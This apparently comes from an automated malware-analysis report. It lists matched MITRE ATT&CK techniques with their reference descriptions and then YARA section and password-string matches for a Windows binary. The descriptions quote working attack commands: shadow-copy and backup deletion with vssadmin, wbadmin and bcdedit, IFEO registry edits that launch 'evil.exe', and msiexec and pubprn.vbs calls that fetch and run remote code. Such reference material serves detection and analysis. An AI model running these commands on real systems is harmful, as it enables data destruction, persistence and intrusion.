logged onto the system. The adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread. Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. (Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)
t1135 Network Share Discovery net share Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. ### Windows File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share. Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. ### Mac On Mac, locally mounted shares can be viewed with the df -aH command.
t1136 Create Account net user Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. The net user commands can be used to create a local or domain account.
t1139 Bash History /dev/null Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
t1140 Deobfuscate/Decode Files or Information certutil -decode,certutil Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system. One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016) Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.
t1142 Keychain security Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.
t1145 Private Keys .ssh Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto) Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)
t1148 HISTCONTROL history The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.
t1153 Source source The source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways source /path/to/filename [arguments] or . /path/to/filename [arguments]. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.
t1154 Trap trap,ctrl+c The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.
t1155 AppleScript osascript macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
t1158 Hidden Files and Directories attrib +h To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS). Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files. ### Windows Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”. ### Linux/Mac Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: defaults write com.apple.finder AppleShowAllFiles YES, and then relaunch the Finder Application. ### Mac Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
t1166 Setuid and Setgid chmod ,ls -l When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).
t1179 Hooking credenumeratea Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via: * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017) * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015) * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use. Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)
t1182 AppCert DLLs createprocessasuser Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
t1183 Image File Execution Options Injection debugger,globalflag Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018) * reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 * reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 * reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation. Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
t1187 Forced Authentication file: The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security) Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information including the user's hashed credentials over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials, or reuse it for [Pass the Hash](https://attack.mitre.org/techniques/T1075). (Citation: Cylance Redirect to SMB) There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include: * A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017) * A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
t1196 Control Panel Items \windows,control.exe Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL) Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
t1216 Signed Script Proxy Execution cscript Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts. PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)
t1218 Signed Binary Proxy Execution msiexec.exe Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques. ### Msiexec.exe Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec) * msiexec.exe /q /i "C:\path\to\file.msi" * msiexec.exe /q /i http[:]//site[.]com/file.msi * msiexec.exe /y "C:\path\to\file.dll" ### Mavinject.exe Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32) * "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL> * C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL> ### SyncAppvPublishingServer.exe SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer) ### Odbcconf.exe Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) * odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"} Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)
t1222 File Permissions Modification attrib File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions) Adversaries may modify file permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.
t1424 None /proc None
t1484 Group Policy Modification sysvol Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Disabling Security Tools](https://attack.mitre.org/techniques/T1089), [Remote File Copy](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1035) and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) Publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
t1489 Service Stop msexchangeis Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
t1490 Inhibit System Recovery wmic,vssadmin,bcdedit Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
t1497 Virtualization/Sandbox Evasion systembiosversion,vmware Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015) ###Virtual Machine Environment Artifacts Discovery### Adversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. Example VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017) * HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions * HKLM\HARDWARE\Description\System\”SystemBiosVersion”;”VMWARE” * HKLM\HARDWARE\ACPI\DSDT\BOX_ Example VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017) * WINDOWS\system32\drivers\vmmouse.sys * WINDOWS\system32\vboxhook.dll * Windows\system32\vboxdisp.dll Common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) ###User Activity Discovery### Adversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017). ###Virtual Hardware Fingerprinting Discovery### Adversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = “Select * from Win32_Fan” Get-WmiObject -Query $q. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)
t1501 Systemd Service .service,/usr/lib/systemd/system Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. * ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. * ExecReload directive covers when a service restarts. * ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'. Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)

YARA:MATCHES

Count Offset Rule Patteren Parsed Condition
0 0x308 Control_Flow_Guard_Detecton_1 .00cfg None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
5 0x268 0xf90d8 0x12ac84 0x12aca8 0x17ba08 0x1936d9 Data_Section_Detecton_1 .data None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
0 0x2e0 section_added_by_new_Visual_Studio_14_0__Detecton_1 .gfids None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
2 0x2b8 0x179cfa 0x193701 Initialized_Data_Section_Borland__Detecton_1 .idata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
0 0x290 Exception_Handling_Functions_Section_PDATA_records__Detecton_1 .pdata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
2 0x240 0xf90b0 0x17b9e0 Read_only_initialized_Data_Section_MS_and_Borland__Detecton_1 .rdata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
1 0x358 0x179d4a Relocations_Section_Detecton_1 .reloc None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
4 0x330 0x133f8b 0x172708 0x179d22 0x17ba30 Resource_section_Detecton_1 .rsrc None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
9 0x218 0xf9088 0x11ef5e 0x1227bf 0x1527f9 0x17b9b8 0x193689 0x1936b1 0x19e212 0x1a1c73 Code_Section_Detecton_2 .text None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
4 0x2b9 0x12a4bd 0x12a4fa 0x179cfb 0x193702 Initialized_Data_Section_C_RunTime__Detecton_2 idata None uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and (for any of them : ( $ in (0..1024) ))
23 0x65200 0x66e01 0x66fd1 0xf8a35 0xf9fbc 0xf9fc6 0xfa005 0xfb747 0xfb751 0xfc4d6 0xfde5e 0x118645 0x11af97 0x11b07c 0x11b5df 0x11c341 0x11c35a 0x1429c0 0x147813 0x14bb76 0x150a27 0x19aaa9 0x19aab9 0x19daa6 Top1000Passwords 123456 None any of them
2 0x117e6d 0x117eb5 0x1464f3 Top1000Passwords 123456 None any of them
